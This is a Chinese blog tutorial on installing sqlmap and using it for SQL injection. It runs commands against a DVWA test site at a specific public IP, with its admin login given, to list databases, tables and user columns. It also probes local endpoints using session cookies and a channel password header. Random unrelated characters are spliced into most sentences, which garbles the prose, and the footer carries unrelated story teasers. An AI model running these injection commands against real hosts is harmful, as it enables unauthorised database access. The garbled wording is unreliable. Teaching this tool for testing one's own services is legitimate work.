sqlmap介紹與使用案例

1.sqlmap簡(jiǎn)介

最白話的介紹就是sqlmap是一個(gè)工具,一個(gè)用來(lái)做sql注入攻擊的工具

2.windows安裝python2

這個(gè)sqlmap需要python2才可以正常執(zhí)行客年,注意python3不行哦橘蜜,如果你已經(jīng)安裝了python3涣澡,本地同時(shí)安裝python2和python3,需要注意修改其中一個(gè)python執(zhí)行文件的名字,以便在path中添加環(huán)境變量的時(shí)候演怎,可以正確區(qū)分大诸,詳細(xì)這里不進(jìn)行贅述捅厂,如果不了解,建議自行百度资柔。

3. windows安裝sqlmap

3.1 下載壓縮包

在sqlmap的網(wǎng)站上下載對(duì)應(yīng)的壓縮文件
http://sqlmap.org/

3.2 解壓文件

解壓到任意文件夾皆可
解壓以后大概是這個(gè)樣子的


之后就是要執(zhí)行這個(gè)sqlmap.py的文件

3.3 啟動(dòng)一個(gè)命令行焙贷,執(zhí)行sqlmap.py

如果出現(xiàn)這個(gè)界面,表示一切正常


按任意鍵結(jié)束

4. 測(cè)試sqlmap功能

4.1 使用DVWA測(cè)試網(wǎng)站

4.1.1 關(guān)于dvwa

這個(gè)網(wǎng)站有sql漏洞贿堰,專(zhuān)門(mén)拿來(lái)測(cè)試用辙芍,不知道是哪位好心人搞出來(lái)的

網(wǎng)址是:http://43.247.91.228:81/login.php
登陸的用戶(hù)名密碼是:admin/password

4.1.2 操作

首先登陸成功以后三步走,拿到需要的url

image.png

拿到url以后羹与,就可以使用這個(gè)url來(lái)注入了

python2 sqlmap.py -u "http://43.247.91.228:81/vulnerabilities/sqli/?id=1&Submit=Submit#"

出現(xiàn)如下結(jié)果故硅,則表示sqlmap檢測(cè)到有可以注入的地方,


ps:如果沒(méi)有檢測(cè)到可以注入的地方纵搁,會(huì)顯示如下


image.png

既然檢測(cè)到有可以注入的地方吃衅,現(xiàn)在我們就來(lái)通過(guò)這個(gè)注入來(lái)獲取一些數(shù)據(jù)庫(kù)的信息

獲取數(shù)據(jù)庫(kù)
python2 sqlmap.py -u "http://43.247.91.228:81/vulnerabilities/sqli/?id=1&Submit=Submit#" --dbs

可以看到執(zhí)行以后拿到了數(shù)據(jù)庫(kù)的信息


再進(jìn)一步,獲取數(shù)據(jù)庫(kù)中表的信息

python2 sqlmap.py -u "http://43.247.91.228:81/vulnerabilities/sqli/?id=1&Submit=Submit#" -D dvwa --tables

可以看到腾誉,拿到了dvwa這個(gè)庫(kù)中的所有表的名字


image.png

再進(jìn)一步徘层,獲取表中的字段信息

python2 sqlmap.py -u "http://43.247.91.228:81/vulnerabilities/sqli/?id=1&Submit=Submit#" -D dvwa -T users --columns

可以看到,拿到了表中的所有字段


4.2 使用本地網(wǎng)站

4.2.1 本地網(wǎng)站是本地的項(xiàng)目妄辩,現(xiàn)在用本地的項(xiàng)目跑起來(lái)來(lái)測(cè)試sqlmap

主要測(cè)試三個(gè)url:
http://localhost:9099/tjcx/qyzxcx/zscq/sbxx/years?nsrsbh='1234000048500077X3'
http://localhost:9099/record/user/2019-03-09
127.0.0.1:9099/open/qyxx/jcsj_gs?nsrsbh=110101717802684

4.2.2 操作--url1

url1:http://localhost:9099/tjcx/qyzxcx/zscq/sbxx/years?nsrsbh='1234000048500077X3'惑灵,這是一個(gè)post請(qǐng)求,nsrsbh是所需要的參數(shù)

執(zhí)行:

python2 sqlmap.py -u "http://localhost:9099/tjcx/qyzxcx/zscq/sbxx/years?nsrsbh='1234000048500077X3'"  --method=POST

可以看到眼耀,沒(méi)有訪問(wèn)到正確的連接英支,而是被重定向到了登陸的login頁(yè)面,這是因?yàn)檫@個(gè)網(wǎng)站需要登陸哮伟,沒(méi)有登陸的情況訪問(wèn)鏈接就會(huì)被重定向到登陸頁(yè)面干花,所以在這里現(xiàn)在瀏覽器中登陸妄帘,然后拿到瀏覽器的cookie,讓sqlmap攜帶著cookie再去攻擊


拿到瀏覽器的cookie

執(zhí)行(攜帶cookie):

python2 sqlmap.py -u "http://localhost:9099/tjcx/qyzxcx/zscq/sbxx/years?nsrsbh='1234000048500077X3'" --cookie="JSESSIONID=9446902e-703b-4c81-914a-9abbd90ed9ce" --method=POST

執(zhí)行結(jié)果:可以看到池凄,并沒(méi)有找到可以注入的地方


image.png

觀察這個(gè)網(wǎng)站的日志抡驼,也可以看到,這個(gè)接口被調(diào)用很多次肿仑,都是sqlmap自動(dòng)調(diào)用的致盟,它在嘗試尋找可以注入的地方


image.png

4.2.3 操作--url2

url2:http://localhost:9099/record/user/2019-03-09,這是一個(gè)get請(qǐng)求,2019-03-09是restful風(fēng)格的參數(shù)

同樣攜帶cookie執(zhí)行:

python2 sqlmap.py -u "http://localhost:9099/record/user/2019-03-09" --cookie="JSESSIONID=9446902e-703b-4c81-914a-9abbd90ed9ce" --method=GET

執(zhí)行結(jié)果尤慰,沒(méi)有發(fā)現(xiàn)可以注入的地方


查看網(wǎng)站后臺(tái)馏锡,接口同樣被調(diào)用多次

4.2.3 操作--url3

url3:127.0.0.1:9099/open/qyxx/jcsj_gs?nsrsbh=110101717802684,這也是一個(gè)get請(qǐng)求伟端,但是不同的是杯道,這個(gè)接口不需要cookie就可以訪問(wèn),但是需要攜帶正確的header才可以執(zhí)行

攜帶header執(zhí)行:

python2 sqlmap.py -u "127.0.0.1:9099/open/qyxx/jcsj_gs?nsrsbh=110101717802684"  --method=GET --headers="type:pwd\nchannelPwd:f1e7e7f187f84cdfb4784481ed01abd5\nchannelId:FDDX_PWD"

執(zhí)行結(jié)果责蝠,沒(méi)有找到可以注入的地方


查看后臺(tái)党巾,接口同樣被調(diào)用多次


5. 總結(jié)

簡(jiǎn)單的使用就是這樣,需要一個(gè)url霜医,有的可能需要攜帶cookie齿拂,有的可能需要攜帶header,
如果找到了注入點(diǎn)支子,就可以拿到一些數(shù)據(jù)信息创肥,但是現(xiàn)在的網(wǎng)站通常也比較難找到可以注入的url。
可以通過(guò)這種方式來(lái)檢測(cè)自己寫(xiě)的接口是否有被sql注入的風(fēng)險(xiǎn)

關(guān)于sqlmap的命令還有更深入的值朋,可以通過(guò)-h或者--help來(lái)查看更多的指令操作,比如不想每次執(zhí)行語(yǔ)句的時(shí)候都要手動(dòng)確認(rèn)一些選擇項(xiàng)巩搏,可以通過(guò)--batch指令昨登,讓sqlmap自己去決定。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末贯底,一起剝皮案震驚了整個(gè)濱河市丰辣,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌禽捆,老刑警劉巖笙什,帶你破解...
    沈念sama閱讀 211,042評(píng)論 6 490
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異胚想,居然都是意外死亡琐凭,警方通過(guò)查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 89,996評(píng)論 2 384
  • 文/潘曉璐 我一進(jìn)店門(mén)浊服,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)统屈,“玉大人胚吁,你說(shuō)我怎么就攤上這事〕钽荆” “怎么了腕扶?”我有些...
    開(kāi)封第一講書(shū)人閱讀 156,674評(píng)論 0 345
  • 文/不壞的土叔 我叫張陵,是天一觀的道長(zhǎng)吨掌。 經(jīng)常有香客問(wèn)我半抱,道長(zhǎng),這世上最難降的妖魔是什么膜宋? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 56,340評(píng)論 1 283
  • 正文 為了忘掉前任窿侈,我火速辦了婚禮,結(jié)果婚禮上激蹲,老公的妹妹穿的比我還像新娘棉磨。我一直安慰自己,他們只是感情好学辱,可當(dāng)我...
    茶點(diǎn)故事閱讀 65,404評(píng)論 5 384
  • 文/花漫 我一把揭開(kāi)白布乘瓤。 她就那樣靜靜地躺著,像睡著了一般策泣。 火紅的嫁衣襯著肌膚如雪衙傀。 梳的紋絲不亂的頭發(fā)上,一...
    開(kāi)封第一講書(shū)人閱讀 49,749評(píng)論 1 289
  • 那天萨咕,我揣著相機(jī)與錄音统抬,去河邊找鬼。 笑死危队,一個(gè)胖子當(dāng)著我的面吹牛聪建,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播茫陆,決...
    沈念sama閱讀 38,902評(píng)論 3 405
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼金麸,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來(lái)了簿盅?” 一聲冷哼從身側(cè)響起挥下,我...
    開(kāi)封第一講書(shū)人閱讀 37,662評(píng)論 0 266
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎桨醋,沒(méi)想到半個(gè)月后棚瘟,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 44,110評(píng)論 1 303
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡喜最,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,451評(píng)論 2 325
  • 正文 我和宋清朗相戀三年偎蘸,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 38,577評(píng)論 1 340
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡禀苦,死狀恐怖蔓肯,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情振乏,我是刑警寧澤蔗包,帶...
    沈念sama閱讀 34,258評(píng)論 4 328
  • 正文 年R本政府宣布,位于F島的核電站慧邮,受9級(jí)特大地震影響调限,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜误澳,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,848評(píng)論 3 312
  • 文/蒙蒙 一耻矮、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧忆谓,春花似錦裆装、人聲如沸。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 30,726評(píng)論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)。三九已至昙沦,卻和暖如春琢唾,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背盾饮。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 31,952評(píng)論 1 264
  • 我被黑心中介騙來(lái)泰國(guó)打工采桃, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人丘损。 一個(gè)月前我還...
    沈念sama閱讀 46,271評(píng)論 2 360
  • 正文 我出身青樓普办,卻偏偏與公主長(zhǎng)得像,于是被迫代替她去往敵國(guó)和親徘钥。 傳聞我的和親對(duì)象是個(gè)殘疾皇子泌豆,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 43,452評(píng)論 2 348

推薦閱讀更多精彩內(nèi)容

  • sqlmap用戶(hù)手冊(cè) 說(shuō)明:本文為轉(zhuǎn)載,對(duì)原文中一些明顯的拼寫(xiě)錯(cuò)誤進(jìn)行修正吏饿,并標(biāo)注對(duì)自己有用的信息。 ======...
    wind_飄閱讀 2,035評(píng)論 0 5
  • sqlmap也是滲透中常用的一個(gè)注入工具蔬浙,其實(shí)在注入工具方面猪落,一個(gè)sqlmap就足夠用了,只要你用的熟畴博,秒殺各種工...
    linkally閱讀 6,869評(píng)論 1 40
  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 當(dāng)給sq...
    xuningbo閱讀 10,277評(píng)論 2 22
  • sqlmap是一個(gè)開(kāi)源的滲透測(cè)試工具笨忌,可以用來(lái)進(jìn)行自動(dòng)化檢測(cè),利用SQL注入漏洞俱病,獲取數(shù)據(jù)庫(kù)服務(wù)器的權(quán)限官疲。它具有功...
    道書(shū)簡(jiǎn)閱讀 1,408評(píng)論 0 0
  • 明天袱结,學(xué)校春游,晚飯之后途凫,女兒讓媽媽陪她到超市買(mǎi)春游的午飯垢夹。 整整兩個(gè)小時(shí),超市维费、蛋糕店果元,到處都...
    selfeducation閱讀 256評(píng)論 0 1